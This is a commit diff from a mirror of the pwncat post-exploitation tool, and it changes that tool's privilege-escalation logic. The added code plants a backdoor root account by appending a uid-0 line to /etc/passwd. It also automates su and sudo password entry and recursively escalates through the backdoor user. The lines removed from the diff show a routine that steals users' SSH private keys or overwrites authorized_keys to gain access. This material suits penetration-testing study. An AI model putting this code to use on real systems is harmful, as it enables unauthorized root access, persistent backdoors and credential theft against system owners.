mirror of
https://github.com/calebstewart/pwncat.git
synced 2024-11-27 19:04:15 +01:00
Corrected pty sending and sudo password things
This commit is contained in:
parent
42d845def4
commit
b5f1bcb4ce
@ -1,14 +1,10 @@
|
||||
#!/usr/bin/env python3
|
||||
from typing import Type, List, Tuple
|
||||
from colorama import Fore, Style
|
||||
from prompt_toolkit.shortcuts import confirm
|
||||
import functools
|
||||
import crypt
|
||||
from time import sleep
|
||||
import socket
|
||||
from pprint import pprint
|
||||
import re
|
||||
import os
|
||||
|
||||
from pwncat.privesc.base import Method, PrivescError, Technique, SuMethod
|
||||
from pwncat.privesc.setuid import SetuidMethod
|
||||
@ -23,7 +19,8 @@ from pwncat import util
|
||||
# privesc_methods = [SetuidMethod, SuMethod]
|
||||
# privesc_methods = [SuMethod, SudoMethod, SetuidMethod, DirtycowMethod, ScreenMethod]
|
||||
# privesc_methods = [SuMethod, SudoMethod, ScreenMethod, SetuidMethod]
|
||||
privesc_methods = [SuMethod, SudoMethod, SetuidMethod]
|
||||
# privesc_methods = [SuMethod, SudoMethod, SetuidMethod]
|
||||
privesc_methods = [SuMethod, SetuidMethod]
|
||||
|
||||
|
||||
class Finder:
|
||||
@ -285,8 +282,6 @@ class Finder:
|
||||
for technique in techniques:
|
||||
if Capability.SHELL in technique.capabilities:
|
||||
try:
|
||||
util.progress(f"attempting {technique}")
|
||||
|
||||
# Attempt our basic, known technique
|
||||
exit_script = technique.method.execute(technique)
|
||||
self.pty.flush_output()
|
||||
@ -331,10 +326,6 @@ class Finder:
|
||||
# Grab the first writer
|
||||
writer = writers[0]
|
||||
|
||||
util.progress(
|
||||
f"adding {self.backdoor_user_name} to /etc/passwd with {writer}"
|
||||
)
|
||||
|
||||
# Read /etc/passwd
|
||||
with self.pty.open("/etc/passwd", "r") as filp:
|
||||
data = filp.readlines()
|
||||
@ -342,10 +333,10 @@ class Finder:
|
||||
# Add a new user
|
||||
password = crypt.crypt(self.backdoor_password)
|
||||
user = self.backdoor_user_name
|
||||
data.append(f"{user}:{password}:0:0::/root:{self.pty.shell}")
|
||||
data.append(f"{user}:{password}:0:0::/root:{self.pty.shell}\n")
|
||||
|
||||
# Join the data back and encode it
|
||||
data = ("".join(data) + "\n").encode("utf-8")
|
||||
data = ("".join(data)).encode("utf-8")
|
||||
|
||||
# Write the data
|
||||
writer.method.write_file("/etc/passwd", data, writer)
|
||||
@ -363,7 +354,7 @@ class Finder:
|
||||
|
||||
# Switch to the new user
|
||||
# self.pty.process(f"su {user}", delim=False)
|
||||
self.pty.run(f"su {user}", wait=False)
|
||||
self.pty.process(f"su {user}", delim=True)
|
||||
self.pty.recvuntil(": ")
|
||||
|
||||
self.pty.client.send(self.backdoor_password.encode("utf-8") + b"\n")
|
||||
@ -372,23 +363,19 @@ class Finder:
|
||||
|
||||
return writer, "exit"
|
||||
|
||||
util.progress(f"checking for local {Fore.RED}sshd{Fore.RESET} server")
|
||||
|
||||
if len(writers) == 0 and len(readers) == 0:
|
||||
raise PrivescError("no readers and no writers. ssh privesc impossible")
|
||||
# SSH isn't working yet
|
||||
raise PrivescError()
|
||||
|
||||
# Check if there is an SSH server running
|
||||
sshd_running = False
|
||||
ps = self.pty.which("ps")
|
||||
if ps is not None:
|
||||
sshd_running = (
|
||||
b"sshd" in self.pty.subprocess("ps -o command -e", "r").read()
|
||||
)
|
||||
sshd_running = "sshd" in self.pty.subprocess("ps -o command -e", "r").read()
|
||||
else:
|
||||
pgrep = self.pty.which("pgrep")
|
||||
if pgrep is not None:
|
||||
sshd_running = (
|
||||
self.pty.subprocess("pgrep 'sshd'", "r").read().strip() != b""
|
||||
self.pty.subprocess("pgrep 'sshd'", "r").read().strip() != ""
|
||||
)
|
||||
|
||||
sshd_listening = False
|
||||
@ -404,187 +391,17 @@ class Finder:
|
||||
|
||||
if netstat != "":
|
||||
# Remove repeated spaces
|
||||
netstat = re.sub(b" +", b" ", netstat).split(b" ")
|
||||
netstat = re.sub(" +", " ", netstat).split(" ")
|
||||
sshd_listening = True
|
||||
sshd_address = netstat[3].split(b":")[0].decode("utf-8")
|
||||
|
||||
used_technique = None
|
||||
sshd_address = netstat[3].split(":")[0]
|
||||
|
||||
if sshd_running and sshd_listening:
|
||||
# We have an SSHD and we have a file read and a file write
|
||||
# technique. We can attempt to leverage this to use SSH to ourselves
|
||||
# and gain access as this user.
|
||||
util.progress(
|
||||
f"found {Fore.RED}sshd{Fore.RESET} listening at "
|
||||
f"{Fore.CYAN}{sshd_address}:22{Fore.RESET}"
|
||||
)
|
||||
util.info(f"found sshd listening at {sshd_address}:22")
|
||||
|
||||
authkeys_path = ".ssh/authorized_keys"
|
||||
with self.pty.open("/etc/ssh/sshd_config", "r") as filp:
|
||||
for line in filp:
|
||||
if line.startswith("AuthorizedKeysFile"):
|
||||
authkeys_path = line.strip().split()[-1]
|
||||
|
||||
# AuthorizedKeysFile is normally relative to the home directory
|
||||
if not authkeys_path.startswith("/"):
|
||||
# Grab the user information from /etc/passwd
|
||||
home = self.pty.users[techniques[0].user]["home"]
|
||||
|
||||
if home == "" or home is None:
|
||||
raise PrivescError("no user home directory, can't add ssh keys")
|
||||
|
||||
authkeys_path = os.path.join(home, authkeys_path)
|
||||
|
||||
util.progress(
|
||||
f"found authorized keys at {Fore.CYAN}{authkeys_path}{Fore.RESET}"
|
||||
)
|
||||
|
||||
authkeys = []
|
||||
if readers:
|
||||
reader = readers[0]
|
||||
with reader.method.read_file(authkeys_path, reader) as filp:
|
||||
authkeys = [line.strip().decode("utf-8") for line in filp]
|
||||
|
||||
# Some payloads will return the stderr of the file reader. Check
|
||||
# that the authorized_keys even existed
|
||||
if len(authkeys) == 1 and "no such file" in authkeys[0].lower():
|
||||
authkeys = []
|
||||
|
||||
# We need to read each of the users keys in the ".ssh" directory
|
||||
# to see if they contain a public key that is already allowed on
|
||||
# this machine. If so, we can read the private key and
|
||||
# authenticate without a password and without clobbering their
|
||||
# keys.
|
||||
ssh_key_glob = os.path.join(
|
||||
self.pty.users[reader.user]["home"], ".ssh", "*.pub"
|
||||
)
|
||||
# keys = self.pty.run(f"ls {ssh_key_glob}").strip().decode("utf-8")
|
||||
keys = ["id_rsa.pub"]
|
||||
keys = [
|
||||
os.path.join(self.pty.users[reader.user]["home"], ".ssh", key)
|
||||
for key in keys
|
||||
]
|
||||
|
||||
# Iterate over each public key found in the home directory
|
||||
for pubkey_path in keys:
|
||||
if pubkey_path == "":
|
||||
continue
|
||||
util.progress(
|
||||
f"checking if {Fore.CYAN}{pubkey_path}{Fore.RESET} "
|
||||
"is an authorized key"
|
||||
)
|
||||
# Read the public key
|
||||
with reader.method.read_file(pubkey_path, reader) as filp:
|
||||
pubkey = filp.read().strip().decode("utf-8")
|
||||
# Check if it matches
|
||||
if pubkey in authkeys:
|
||||
util.progress(
|
||||
f"{Fore.GREEN}{os.path.basename(pubkey_path)}{Fore.RESET} "
|
||||
f"is in {Fore.GREEN}{reader.user}{Fore.RESET} authorized keys"
|
||||
)
|
||||
# remove the ".pub" to find the private key
|
||||
privkey_path = pubkey_path.replace(".pub", "")
|
||||
# Make sure the private key exists
|
||||
if (
|
||||
b"no such file"
|
||||
in self.pty.run(f"file {privkey_path}").lower()
|
||||
):
|
||||
util.progress(
|
||||
f"{Fore.CYAN}{os.path.basename(pubkey_path)}{Fore.RESET} "
|
||||
f"has no private key"
|
||||
)
|
||||
continue
|
||||
|
||||
util.progress(
|
||||
f"download private key from {Fore.CYAN}{privkey_path}{Fore.RESET}"
|
||||
)
|
||||
with reader.method.read_file(privkey_path, reader) as filp:
|
||||
privkey = filp.read().strip().decode("utf-8")
|
||||
|
||||
# The terminal adds \r most of the time. This is a text
|
||||
# file so this is safe.
|
||||
privkey = privkey.replace("\r\n", "\n")
|
||||
|
||||
used_technique = reader
|
||||
|
||||
break
|
||||
else:
|
||||
privkey_path = None
|
||||
privkey = None
|
||||
elif writers:
|
||||
util.warn(
|
||||
"no readers found for {Fore.GREEN}{techniques[0].user}{Fore.RESET}"
|
||||
)
|
||||
util.warn(f"however, we do have a writer.")
|
||||
if not confirm("would you like to clobber their authorized keys?"):
|
||||
raise PrivescError("user aborted key clobbering")
|
||||
|
||||
# If we don't already know a private key, then we need a writer
|
||||
if privkey_path is None and not writers:
|
||||
raise PrivescError("no writers available to add private keys")
|
||||
|
||||
# Everything looks good so far. We are adding a new private key. so we
|
||||
# need to read in the private key and public key, then add the public
|
||||
# key to the user's authorized_keys. The next step will upload the
|
||||
# private key in any case.
|
||||
if privkey_path is None:
|
||||
|
||||
writer = writers[0]
|
||||
|
||||
# Write our private key to a random location
|
||||
with open(self.pty.default_privkey, "r") as src:
|
||||
privkey = src.read()
|
||||
|
||||
with open(self.pty.default_privkey + ".pub", "r") as src:
|
||||
pubkey = src.read().strip()
|
||||
|
||||
# Add our public key to the authkeys
|
||||
authkeys.append(pubkey)
|
||||
|
||||
# Write the file
|
||||
writer.method.write_file(
|
||||
authkeys_path, ("\n".join(authkeys) + "\n").encode("utf-8"), writer
|
||||
)
|
||||
|
||||
used_technique = writer
|
||||
|
||||
# SSH private keys are annoying and **NEED** a newline
|
||||
privkey = privkey.strip() + "\n"
|
||||
|
||||
with self.pty.tempfile("w", length=len(privkey)) as dst:
|
||||
# Write the file with a nice progress bar
|
||||
dst.write(privkey)
|
||||
# Save the path to the private key. We don't need the original path,
|
||||
# if there was one, because the current user can't access the old
|
||||
# one directly.
|
||||
privkey_path = dst.name
|
||||
|
||||
# Ensure the permissions are right so ssh doesn't freak out
|
||||
self.pty.run(f"chmod 600 {privkey_path}")
|
||||
|
||||
# Run ssh as the given user with our new private key
|
||||
util.progress(
|
||||
f"attempting {Fore.RED}ssh{Fore.RESET} to "
|
||||
f"localhost as {Fore.GREEN}{techniques[0].user}{Fore.RESET}"
|
||||
)
|
||||
ssh = self.pty.which("ssh")
|
||||
|
||||
# First, run a test to make sure we authenticate
|
||||
command = (
|
||||
f"{ssh} -i {privkey_path} -o StrictHostKeyChecking=no -o PasswordAuthentication=no "
|
||||
f"{techniques[0].user}@127.0.0.1"
|
||||
)
|
||||
output = self.pty.run(f"{command} echo good")
|
||||
|
||||
# Check if we succeeded
|
||||
if b"good" not in output:
|
||||
raise PrivescError("ssh private key failed")
|
||||
|
||||
# Great! Call SSH again!
|
||||
self.pty.process(command)
|
||||
|
||||
# Pretty sure this worked!
|
||||
return used_technique, "exit"
|
||||
raise PrivescError()
|
||||
|
||||
def escalate(
|
||||
self,
|
||||
@ -655,6 +472,22 @@ class Finder:
|
||||
except PrivescError:
|
||||
pass
|
||||
|
||||
if self.backdoor_user_name in techniques:
|
||||
try:
|
||||
tech, exit_command = self.escalate_single(
|
||||
techniques[self.backdoor_user_name], shlvl
|
||||
)
|
||||
chain.append((tech, exit_command))
|
||||
except PrivescError:
|
||||
pass
|
||||
else:
|
||||
try:
|
||||
return self.escalate(target_user, depth, chain, starting_user)
|
||||
except PrivescError:
|
||||
tech, exit_command = chain[-1]
|
||||
self.pty.run(exit_command, wait=False)
|
||||
chain.pop()
|
||||
|
||||
# We can't escalate directly to the target. Instead, try recursively
|
||||
# against other users.
|
||||
for user, techs in techniques.items():
|
||||
|
@ -95,7 +95,7 @@ class SuMethod(Method):
|
||||
for user, info in self.pty.users.items():
|
||||
if user == current_user:
|
||||
continue
|
||||
if info.get("password") is not None:
|
||||
if info.get("password") is not None or current_user == "root":
|
||||
result.append(
|
||||
Technique(
|
||||
user=user,
|
||||
@ -109,29 +109,34 @@ class SuMethod(Method):
|
||||
|
||||
def execute(self, technique: Technique):
|
||||
|
||||
current_user = self.pty.current_user
|
||||
|
||||
password = technique.ident.encode("utf-8")
|
||||
|
||||
# Send the su command, and check if it succeeds
|
||||
self.pty.run(
|
||||
f'su {technique.user} -c "echo good"', wait=False,
|
||||
)
|
||||
if current_user["name"] != "root":
|
||||
# Send the su command, and check if it succeeds
|
||||
self.pty.run(
|
||||
f'su {technique.user} -c "echo good"', wait=False,
|
||||
)
|
||||
|
||||
self.pty.recvuntil(": ")
|
||||
self.pty.client.send(password + b"\n")
|
||||
self.pty.recvuntil(": ")
|
||||
self.pty.client.send(password + b"\n")
|
||||
|
||||
# Read the response (either "Authentication failed" or "good")
|
||||
result = self.pty.recvuntil("\n")
|
||||
# Probably, the password wasn't echoed. But check all variations.
|
||||
if password in result or result == b"\r\n" or result == b"\n":
|
||||
# Read the response (either "Authentication failed" or "good")
|
||||
result = self.pty.recvuntil("\n")
|
||||
# Probably, the password wasn't echoed. But check all variations.
|
||||
if password in result or result == b"\r\n" or result == b"\n":
|
||||
result = self.pty.recvuntil("\n")
|
||||
|
||||
if b"failure" in result.lower() or b"good" not in result.lower():
|
||||
raise PrivescError(f"{technique.user}: invalid password")
|
||||
if b"failure" in result.lower() or b"good" not in result.lower():
|
||||
raise PrivescError(f"{technique.user}: invalid password")
|
||||
|
||||
self.pty.process(f"su {technique.user}", delim=False)
|
||||
self.pty.recvuntil(": ")
|
||||
self.pty.client.sendall(technique.ident.encode("utf-8") + b"\n")
|
||||
self.pty.flush_output()
|
||||
|
||||
if current_user["name"] != "root":
|
||||
self.pty.recvuntil(": ")
|
||||
self.pty.client.sendall(technique.ident.encode("utf-8") + b"\n")
|
||||
self.pty.flush_output()
|
||||
|
||||
return "exit"
|
||||
|
||||
|
@ -79,12 +79,15 @@ class SudoMethod(Method):
|
||||
|
||||
# Process the prompt but it will not wait for the end of the output
|
||||
# delim = self.pty.process("sudo -l", delim=True)
|
||||
delim = self.pty.process("sudo -p 'Password: ' -l", delim=True)
|
||||
sdelim, edelim = [
|
||||
x.encode("utf-8")
|
||||
for x in self.pty.process("sudo -p 'Password: ' -l", delim=True)
|
||||
]
|
||||
|
||||
self.send_password(current_user)
|
||||
|
||||
# Get the sudo -l output
|
||||
output = self.pty.recvuntil(delim).split(delim)[0].strip()
|
||||
output = self.pty.recvuntil(edelim).split(edelim)[0].strip()
|
||||
sudo_output_lines = output.split(b"\n")
|
||||
|
||||
# Determine the starting line of the valuable sudo input
|
||||
|
Loading…
Reference in New Issue
Block a user